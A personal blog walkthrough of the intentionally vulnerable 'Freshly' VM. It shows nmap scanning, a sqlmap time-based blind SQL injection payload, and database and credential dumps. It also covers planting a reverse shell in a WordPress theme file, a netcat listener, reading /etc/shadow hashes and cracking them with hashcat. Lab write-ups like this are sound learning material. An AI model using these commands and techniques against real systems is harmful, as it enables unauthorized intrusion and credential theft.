Walkthrough Freshly

I did another vulnerable VM. This one is called Freshly and can be found here. It is also made by tophatsec, so thanks tophatsec for another great VM. Let’s get started.

First let’s find the machine.

nmap 192.168.1.1/24

Great, now that we got the ip, let’s scan it.

nmap -A -T4 -p- 192.168.1.107                        [12:17:27]

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-24 12:18 CLST
Nmap scan report for 192.168.1.107
Host is up (0.00058s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds

Okay, so we have a port 80, and SSL-port 443, and port 8080. All web.
On port 80 there is just a star-wars gif. I download it and check it out if exiftool just in case. But nothing of interest.

I fire up ZAP and start doing a Force Browse (DirBusting).
Meanwhile I check out port 8080 and port 443. Both of them seem to lead to a wordpress-installation. I snoop around and find that there is a user named admin (the default user in wordpress). I try to login with admin/admin in /wp-admin but no result. I also try a dictionary-attack but without any luck. But I am not blocked out, so that means there are no plugins with fail2ban -features.

I try some sqlinjections in the store but without success.

So I go back to ZAP to see what it has found. And I can see that it has found a page called /login.php and phpmyadmin. So I head over to login.php and find a login. I use sqlmap to see if there are any vulnerabilities.

So I make a request and the intercept it in burp suite, and copypaste the request to a file I call request.txt. “user” is the parameter that I am testing for injections.

./sqlmap.py -r request.txt -p user

Okay, so sqlmap found a time-based blind.

---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=' AND (SELECT * FROM (SELECT(SLEEP(5)))RRpU) AND 'wUfW'='wUfW&password=&s=Submit
---

I had never successfully used sqlmap before, so this was a great learning experience. So after finding out that there is a vulnerability I run the following command to get the databases. It really took a long time because it was a time-based attack.

./sqlmap.py -r request.txt -p user --dbs 

Output:

available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Then I wanted the tables and the content, so I ran:

./sqlmap.py -r request.txt -p user --tables -D wordpress8080

Database: wordpress8080
[1 table]
+-------+
| users |
+-------+
./sqlmap.py -r request.txt -p user --dump -D wordpress8080 -T users                                  [18:45:53]
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

So yeah, not so secret password. I used it to login to wordpress.
This guide was quite useful to get the hang of sqlmap.

So, admin on a CMS usually means shell. So I went to appearance/editor and then I just copy-pasted my reverse shell into header.php. Probably not the most silent way, but it is easy to remove the code after it has been executed.
Then I fired up netcat. With:

nc -v -l 1234

-v stands for verbose. -l for listening. And 1234 is the port. The -p flag is not really needed to define the port.

Make sure that your firewall is open.

sudo ufw allow 1234

So, now I got a shell with the user daemon

uid=1(daemon) gid=1(daemon) groups=1(daemon)

I create a file in /tmp called linEnum.sh where I copypaste the linEnum-file. Then:

chmod +x linEnum.sh
./linEnum.sh

To enumerate important and interesting files. It outputs a lot of stuff, among others this:
/etc/passwd

user:x:1000:1000
mysql:x:103:111
candycane:x:1001:1001
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

And the following in /etc/shadow

root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::

There is also a message in the shadow-file:
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

I thought I had to reach root, so I didn’t really think of this as the flag. So I copied the hashes and started running hashcat on them, which was fun as it was the first time. So I ran it an all the three hashes, with the following command.

./hashcat-cli64.bin -m 1800 -a 0 -o found.txt --remove candycane.hash ~/sectools/SecLists/Passwords/10_million_password_list_top_100000.txt

I only found the password for candycane which was “password”. I didn’t manage to crack the other users.

Now I wanted to su up for candycane but it didn’t work since I didn’t have a tty-shell. And

import pty; pty.spawn('/bin/bash')

this didn’t work. But I found a workaround.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
ptyhon shell.py

So this gave me a tty-shell and I could run su candycane.

So, here I got stuck a while and started looking back in my notes to see if I had missed something. So I took out the content from the databse login

Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir       |
+----------+-----------+

And I tried these passwords on user and root. But it didn’t work. After many other tries enumerating the system I gave up. And on some other walkthroughs I found that the password for user (which was a sudo-user) and root was SuperSecretPassword. So that was a little bit annoying that I never tried that. And I also found out that it was the same password for the mysql-root user. Which could be found in the login.php-file. So that was a little bit stupid that I never checked that.

Conclusion

All in all it was a great VM. I got to learn tools like hashcat and sqlmap, which I am sure will come in handy on other VMs. I also learned about wpscan while reading other walkthroughs. I was surprised that SuperSecretPassword was not found in my password-dictionaries that I tried.

Other things that I missed was playing around with phpmyadmin. I read in some other walkthroughs that you could figure out the DBMS from it. That would have been good.

But at least I got the flags.

Leave a Reply

